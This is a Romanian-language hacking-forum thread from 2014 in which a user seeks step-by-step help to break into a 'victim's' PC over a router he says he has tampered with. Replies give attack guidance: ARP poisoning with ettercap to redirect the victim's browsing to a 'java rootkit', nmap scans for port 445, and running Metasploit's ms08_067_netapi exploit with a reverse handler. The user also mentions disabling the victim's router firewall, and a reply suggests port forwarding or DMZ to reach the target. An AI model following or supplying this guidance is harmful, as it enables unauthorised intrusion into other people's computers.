lafurat Posted March 5, 2014 Report Posted March 5, 2014 Salut As vrea sa intreb daca cineva imi poate explica cum sa am acces la PC unei victime prin Router.As vrea sa fac acest lucru prin BT5.Imi poate explica cineva pas cu pas ce trebuie sa fac ??Am citit pe net ca as putea face acest lucru cu nmap,nessus si msf obtinand un shell cu Metasploit dar nu stiu cum se fac aceste lucruii Quote
Dark_4ngel Posted March 5, 2014 Report Posted March 5, 2014 sau foloseste SET(Social Engineering Toolkit), arp poisoning pt asta poti folosi si ettercap dar trebe sa umbli ca etter.conf sa dea redirect de pe orice link ar baga el in browser pe pagina ta unde ai un java rootkit bafta Quote
WarLord Posted March 5, 2014 Report Posted March 5, 2014 As vrea sa intreb daca cineva imi poate explica cum sa am acces la PC unei victime prin Router. - decat daca ai access la router sa poti modifica configuratia si sa deschizi porturi, altfel nu prea vad cum. Quote
lafurat Posted March 5, 2014 Author Report Posted March 5, 2014 Da am acces la router si o sa ii desactivez Firewall-ul de la Router. Si o sa incerc sa fac ce mi-o recomandat @Reckon am gasit pe Youtube un video " Hacking a windows xp machine in LAN with metasploit " O sa incerc sa il fac pas cu pas sa vad daca imi merge Am vrut sa te intreb daca este bun video-ul pt ca sunt mai multe Quote
lafurat Posted March 5, 2014 Author Report Posted March 5, 2014 (edited) OK mersi.Deci ca sa fac chestia asta trebuie sa fac un Virtual Machine sa rulez BT5 ca sa fiu conectat prin Wifi la victima nu ?? Edited March 5, 2014 by lafurat Quote
lafurat Posted March 5, 2014 Author Report Posted March 5, 2014 (edited) Salut Am dezactivat Firewallul la Routerul victimei, am facut un scan cu nmap si imi apare asa 445/tcp closed microsoft-ds http://i.imgur.com/s2EbZQa.jpgAm facut ce o spus asta din Video pas cu pas dar nimic. Ip-ul ca sa intru in router este 192.168.1.1 am incercat si cu 192.168.2.1 dar tot nimic, si toate scanurile si atacurii le-am facut cu Firewallul de la router dezactivat http://i.imgur.com/BG3yVvH.jpgCe sa fac acuma ?? Edited March 6, 2014 by lafurat Quote
lafurat Posted March 6, 2014 Author Report Posted March 6, 2014 Nu, acel virtual machine din video e VICTIMA, care o gasesti prin:nmap -v 192.168.1.1-255 -p 445 nmap -v 192.168.1.2-255 depinde de ce IP ti-a dat wifi-ul.Daca vezi ca scrie la port 445 Opened inseamna ca poti intra in pc-ul lui.SalutDeci iti spun pas cu pas ce-am facut sa vezi unde grsesc:1ª M-am conectat la router-ul victimei si am dezactivat Firewall-ul2ª M-am conectat la BT5 prin wifi la routerul victimei, adica la internetul lui3ª Am facut un scan cu Nmap la Ip-ul 192.168.1.1 ( este IP-ul cu care accesezi la configuratia routerul-ui )4ª Rezultatul de la scan cu Namp http://i.imgur.com/X1gUuAQ.jpg Imi trebuia sa execut intr-un nou terminal meterpreter ?? Dupa ce am pus " set RHOST 192.168.1.1 " ca si in video Quote
lafurat Posted March 6, 2014 Author Report Posted March 6, 2014 1. Ti se vede muianu2. Ti-am spus sa dai comanda nmap -v 192.168.1.1-255 -p 445.3. Cand ai gasit IP-ul victimei care are portul 445 deschis, pornesti msfconsole si il setezi ca RHOST dupa dai comanda "exploit".Am facut scanul cu Nmap exact cum mi-ai spus tu si uite unknow http://i.imgur.com/Sb7LLVG.jpg Quote
bcman Posted March 6, 2014 Report Posted March 6, 2014 Dac? ai acces la router po?i face port forwarding sau DMZ (zon? demilitarizat?). Atunci traficul pe un anumit port va ajunge la acela?i IP intern. ?i din set?rile serverului DHCP seteaz? ca MAC-ului victimei s?-i fie tot timpul atribuit acel IP intern. Quote
lafurat Posted March 7, 2014 Author Report Posted March 7, 2014 Am incercat din nou acuma si imi apare asa http://i.imgur.com/uAlFoiH.jpgMulte porturii deschise dar cand scriu " set RHOST 192.168.1.1 " si dupa aceia " exploit " imi apare ca si in poza asta http://i.imgur.com/BG3yVvH.jpgExploit Filed Cine vrea sa faca o sesiune cu mine cu TeamViwer sa vedem daca il rezolvam intre 2 ?? Quote
Flesh Posted March 31, 2014 Report Posted March 31, 2014 (edited) am incercat cum ati spus am scanat cu nmap am primit rezultatul asta:Initiating SYN Stealth Scan at 13:09Scanning 192.168.1.254 [1 port]Completed SYN Stealth Scan at 13:09, 0.78s elapsed (1 total ports)Nmap scan report for 192.168.1.254Host is up (0.080s latency).PORT STATE SERVICE445/tcp filtered microsoft-dsAm pus ip cu RHOST si primesc eroarea asta:msf exploit(ms08_067_netapi) > set RHOST 192.168.1.112RHOST => 192.168.1.112msf exploit(ms08_067_netapi) > exploit[*] Started reverse handler on 192.168.0.112:4444 [-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (192.168.1.112:4444)de la ce poate fi ?Ps:scz ca ma bag in acest topic dar am zis sa nu mai fac altulOk @WarLord mai astept pareri Edited March 31, 2014 by Flesh Quote
WarLord Posted March 31, 2014 Report Posted March 31, 2014 Poate esti detectat de Antivirus avand in vedere ca ii un exploit. Quote
